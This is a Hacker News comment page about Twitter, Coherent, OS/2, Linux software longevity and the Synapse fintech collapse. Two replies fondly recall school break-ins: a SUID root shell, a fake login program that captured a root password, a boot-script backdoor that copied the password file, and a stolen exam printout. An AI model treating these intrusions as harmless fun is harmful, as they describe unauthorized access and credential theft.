Hacker Newsnew | past | comments | ask | show | jobs | submit | cloudsec9's commentslogin

"The basics are simple" ... hrm. I think the concepts of how Twitter works is simple; but during their "fail whale" days, they had to reinvent things on the fly to achieve scale and reliability.

Twitter used to have lots of moving parts, and money flowed from various ads and placements, and that was much more complex then I think people appreciate. With their new head twit, they destroyed most of their ad revenue stream and are now hyping paying for APIs and posting privileges, and it shows.

My main irritation is that people say it "works fine", when lots of crap is broken all over, and it now has regular outages. They have shipped like ONE feature that was mostly done earlier since the takeover.


Another operating system that deserves mention for 286 class machines is Coherent. This was an Unix like OS you could buy for $99, and it had all of the various Unix utilities and came with a HUGE manual to help you learn it.

They had a 386 version as well, but went all in on getting X-windows and graphics working, and ignored TCP/networking just as the Internet started to gain a lot of traction. Still an interesting OS to look at!


The final version of Coherent is FOSS now:

https://github.com/gspu/Coherent


At our school, the "computer" teachers were often teachers who were specialists in other areas that had some interest in computers, and weren't very ... security aware. They all had admin/root user access, and they'd often forget to sign out, leaving us with the keys to the kingdom, at least temporarily.

We figured out how to create a SUID shell, so we could get back to root even after we head logged out. Poking a few bytes would have been more interesting!


I really enjoyed the whole process of figuring out how to get the keys to the kingdom. Our teachers were pretty good about logging out after they were done. The first way I got root was by running a fake login program remotely from another computer. That was a thing about the Icon's, you could run programs remotely from another computer. I knew which computer the teachers liked to log into, so I patiently waited. Eventually it happened, he tried to log in, got "Invalid password or login name", and thought he had fat fingered it. Meanwhile I now had root's password. At that point I put in a backdoor on one of the bootup shell scripts, which checked for the presence of a file, if that file existed, it would copy the first part of the password file somewhere else. At that point, if they changed root's password, I would create the file, reboot my computer, then check for the copy of "passwd" somewhere else. The passwords were in plaintext, they weren't stored as a hash. I discovered the poke method later as I got bored of my existing method. I once got a copy of an exam before the actual exam. I saw the teacher printing something out on the dot matrix printer, and guarding the contents, so I logged into root, and copied the printer spool file. Upon examining the file I discovered it was an exam.


At one time I was a big advocate for Unix/Linux on the desktop, but I think that ship has mostly sailed.

But, it seems that FUD about what it is capable of is still actively here, which is good to know. With frameworks and libraries, there is a 0% chance you don't have SOME update for your Windows app in a couple years, forget 5.

Now, there are lots of headwinds against Linux -- Windows is a known quantity, everyone knows the MS Office suite, people hate change and don't want to learn new stuff.

But to pretend that Linux is a house of cards because there are sometimes issues that cause troubles is not being honest. Even Windows can have big issues, or have we forgotten the CrowdStrike outage earlier this year?

All OSes have always had issues; that's why all of them have patches and updates.


I would blame Microsoft for that one, since they had the ability to ban crowdstrike and others who have no business being in the NT kernel from the NT kernel, but instead gave them access by giving them code signing certificates.

Apple on the other hand got them to switch to userspace:

https://www.crowdstrike.com/en-us/blog/crowdstrike-supports-...


>everyone knows the MS Office suite

How many people are running a locally-installed office suite at this point? Mailing files around seems archaic for most purposes. At my prior (open source) employer, even we had mostly given up on running local office productivity apps.


This is a broken mindset, that you should be able to take an app and use it for 5+ years. When computers were in their infancy, and systems were only updated every 4-6 years, it might have made sense, but this doesn't in our modern software environment.

Nowadays all software is built on libraries and frameworks, and they have security issues and even just bugs, and you want to get those fixes. If you want to run 5+ year old software, you can now do it natively in a VM in almost any computer; so why does my shiny new OS have to run ancient binaries again?


Without intending to be inflammatory, I think that the mindset that you are espousing is broken.

Security is is a real issue for a subset of computing tasks. To further your point, for those tasks you can argue that constant vigilance and patching are a necessity of the modern world (an alternative and arguably better approach would be that formal verification and not updating, as often applied in safety critical control systems.) However, security is often used as a pernicious ruse for forcing obsolesence: want the latest security patches? update to the latest OS version. Oh look, the latest OS version no longer runs on your perfectly good hardware. Or similarly, oh look, your perfectly good software no longer runs on the latest OS version.

But now consider the subset of computing that does not need to involve security either because it has literally no security implications, or because it can be sandboxed by the OS (e.g. games, music and video production, architectural design, scientific simulation, mathematical research, ...) There is a large body of this kind of software that works perfectly well for any number of years (modulo forced obsolesce initiatives like "modernising" the UI or moving to the cloud). I would argue that the primary function of the OS should be to provide a stable platform for running such software securely. Yes, the user could learn how run it under emulation, in a container or VM, but then what is the purpose of the OS?

The alternative is a high software maintenance burden/cost to everyone (for applications to just keep the lights on, or users to stay current in a churning software landscape) and/or the destruction of a massive amount value in developed but no longer easily able to be run software: this value destruction here is twofold: (1) the licensee can no longer run the software that they pay for, and (2) the effort expended to develop said software is discarded.


Okay, I understand what you are trying to say, but some of what you are using as examples doesn't support your argument. Games, unless they are simple single player games, need the network. Scientific sims and math research are best served on the latest hardware, which often needs the latest OS/software to get the most out of it. I think your arguing that MOST software should run without needing to be updated, and when we lived in a dial-up world and before, that was a very viable position. But with all of our machines on an always on network, the OS has to be kept up to date.

Most businesses just want things to work; their software/hardware costs are often rounding errors when amortized over their lifetime. I'm sympathetic to users who have paid for programs wanting to run them forever, but software businesses have to make money and sell new versions, so they add new features and follow the OS upgrades. It's hard for businesses to support older software or a big diversity of versions; it's why companies mandate a standard and try to enforce it.

With Microsoft, they are making millions on OS and related basic programs, and so can afford to support things for a long time. With OSS like Linux, there is less funding and less people who are interested in running old versions. As someone who has had to keep some software up to date on Linux, it can sometimes be more of a pain to update a package (because of dependencies) them to just recompile the thing from source. The 5 years that LTS releases get are good for 2 average commercial update cycles, which I think is reasonable. Beyond that, people's skills are going to be out of date.


Because you might want to run more than one program at a time without having to spin up a VM to do it.


I run many programs at the same time AND run VMs; as long as you have enough memory, this shouldn't be an issue.


I'd disagree that OS/2 was "worthless garbage", as MS would keep using it for several generations for their server/LAN OS.

I'd argue that OS/2 2.x was pretty much a ground-up re-write, as OS/2 1.x had been written for 16-bit 286 protected mode and not the 32-bit 386 protected mode which the next version targeted. IBM did insist that the new version run all of the 1.x 16 bit stuff, but like DOS and Win 3.x mode this was done through some virtualization if memory serves.

The big hurdle OS/2 faced was being memory hungry at a time when memory prices were still high and when the installed base had less then half of the required amount by default.


It wasn't just memory requirements that hurt OS/2. I'd argue one of the biggest hurdles was IBM couldn't stop being IBM for even one second to do any reflection on the realities in the PC market. They still thought they were going to have a renaissance with 386 PS/2 systems for goodness sakes.

And man were they expensive. $195 for OS/2 2.0. That's about $434 in 2024 dollars, and the PS/2 systems that ran it best started north of $2k if memory serves. No one outside of corporate and the biggest enthusiasts were shelling out that kind of money for "a better DOS than DOS" (cough Desqview cough) or "a better Windows (3.1) than Windows (3.1)" (irrelevant and not that impressiive imho).

Love them or hate them, Microsoft has always been good at hitting the 75th percentile, aka "good enough" and "cheap enough". They proved (conclusively) that customers will put up with a mountain of shit if you cost half of what your competitors do. Plus they knew how to make ISVs a lot of money too. IBM just couldn't get it's head out of it's ass, I mean the 1960s.

And for the record, I salivated over OS/2. I scored a beta of 2.0 when I was 14 off of a BBS associate. I had an IBM laser printer, IBM typewriters, an original IBM PC. I thought back then that IBM meant quality (and to be fair, it did).

But they didn't get it and Microsoft did. Windows 95 had pizzaz and hype, the CD had Weezer's Buddy Holly video (video!). They were working to get games running right under 95. They were courting all of the biggest application vendors. They were doing shit. IBM? Too busy being IBM.


> They still thought they were going to have a renaissance with 386 PS/2 systems for goodness sakes.

Yeah but...

If OS/2 1.x had been a 386 OS and delivered on the promise: great DOS compatibility, multitasking including of DOS apps, and built-in networking, with a passable GUI based on Windows 2...

I think it could have been a hit.

I was there, supporting this stuff in production back then.

DOS was a PITA and getting networking working on DOS and still having enough of that all-important first 640kB of RAM left to run anything was hard. I was a master of it. My skills at it landed me several jobs.

NT made all that disappear. RAM was just RAM, each DOS session got all of a virtual instance's RAM dedicated just to it -- and a network drive looked like a local drive. It was like black magic. It was amazing.

Big drives, with a solid filesystem. Long file names. TCP/IP in the box, as standard.

NT 3.1 was amazing stuff, but that was in 1993 and you needed a £5000 PC with 32MB to run it.

OS/2 2.0 delivered this, smaller and faster, in a quarter of the RAM, the year before...

It was amazing. It was a phase shift in the industry. But the networking was extra, TCP/IP was extra, etc. etc.

And it was late. I just wrote about the beta of MICROSOFT OS/2 2.0:

https://www.theregister.com/2024/03/11/trying_ms_prerelease_...

This stuff was ready in 1990.

But if IBM hadn't screwed the project in 1985 or so, OS/2 1.0 could have done that in 1987 or so.

Before Linux (1991), before Windows 3 (1990), before 386BSD (1989).

It could have been the amazing thing that the hype promised. The tech was there and it worked. It could have been got ready in the 1980s.

A PC industry controlled by IBM would be no better than one controlled by Microsoft and it would have been more expensive.

But we all suffered years more of the crap of DOS and DOS memory management and Windows 3.x, because IBM fscked up.

I don't know what would have happened.

Maybe it would have forced the Unix folks to adopt Arm 20 or 30 years earlier and make RISC boxes that were cheaper and cooler-running than x86? Maybe those expensive IBM OS/2 x86 machines would have forced BSD onto Arm and what happened 25Y later with Apple kit happened a generation before with Acorn kit.

I am 100% not saying it would have been a better world... but it would have been a much more different one than the closed narrow imaginations today portray.


> IBM did insist that the new version run all of the 1.x 16 bit stuff, but like DOS and Win 3.x mode this was done through some virtualization if memory serves.

Kind of, but IIRC it was a fundamentally different and more low-level kind of "virtualization": The 80386 processor's virtual[1] 8086 processor mode. Not much for them to do in the OS code itself, compared to writing a whole VM to run DOS apps on (he confidently says, never having written anything of the kind himself).

[1]: Probably not exactly the right word, but I can't recall the correct term right now.


To be fair, OS/2 could be run on less-beefy hardware that would've choked on NT 3.1.


By the time OS/2 came out, IBM wasn't a serious competitor for most OEMs -- they were high end, so were mostly competing with the likes of Compaq.

The big issue that no one is mentioning is that OS/2 needed 8MB of RAM to run decently, preferably more, but this was when most machines were 2-4MB and extra RAM was still a big cost.


> OS/2 needed 8MB of RAM to run decently,

That's OS/2 2.

OS/2 1 is the one that flopped, and nobody had 286 computers with 8MB of RAM.

Hell, the IBM 286 PS/2 machines shipped with 1MB and they cost $6-7K in '87-'88!


100%. I ran it on 4mb and IMHO it was fine but it did need 8mb to shine.


Slight correction - there were some Borland tools for OS/2, but after the split MS stopped putting out new tools; but IBM did have some interesting compiler stuff too.


https://en.wikipedia.org/wiki/VisualAge

> In 1992, Apple and IBM cofounded Taligent, based upon Pink, an operating system with a mass of sophisticated object-oriented compiler and application framework technology from Apple. Pink became CommonPoint, the partnership was dissolved, and CommonPoint was absorbed into VisualAge starting with the Compound Document Framework to handle OLE objects in VisualAge C++ 3.5 for Windows. In February 1997, the first mass release of Taligent technology came in the form of the Open Class within VisualAge C++ 4.0 ... The original prototype which led to VisualAge was an attempt "to make something like the NeXT interface builder" within the Smalltalk/V development environment.


What eventually made it out of VisualAge into the wider FOSS world was Eclipse.

https://wiki.eclipse.org/FAQ_Where_did_Eclipse_come_from%3F

Eclipse is the FOSS version of the C/Java rewrite of Visual Age SmallTalk -- which is still on sale as VAST.

https://www.instantiations.com/company/history/


Fun 40-year incarnation history page!


More to the point, FDIC insurance covers a BANK failure; but in this instance it wasn't the bank that failed. It doesn't even seem it was Yotta that had the issue, but rather their transaction company, Synapse.

Now if Synapse had created individual accounts for the Yotta depositors, we wouldn't be talking now. But what happened was Synapse had a few account(s) for Yotta and a bit of a records gap, which it seems is making it hard to tie Yotta depositors to their money. What's unclear is if this is a Synapse issue, a Yotta issue or something else.

But the fact that there is this accounting issue shows that there is a gap in how FinTechs are actually managing cash flows, to the risk and detriment of their customers/depositors.


It’s not just a matter of tying depositors to their money. There’s something like $100 million that’s actually missing. It’s not clear whether it’s just a matter of finding the accounts or whether it’s actually been stolen somehow. Synapse managed the money. They say it’s with Evolve Bank & Trust, but Evolve says they don’t have it. It seems likely that it was moved and they just lost track, but that doesn’t seem to be entirely known yet.


If it was fully disclosed that this was "gambling", then I might agree.

But it seems that it was more positioned as "a safe investment with okay returns and a lottery chance at winning above average returns". Gamblers don't need to know about FDIC insurance and the like.

There was shady goings on that wasn't clear to depositors -- what isn't clear is WHERE that shadiness was happening, but that doesn't mean they "got what was coming to them".


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: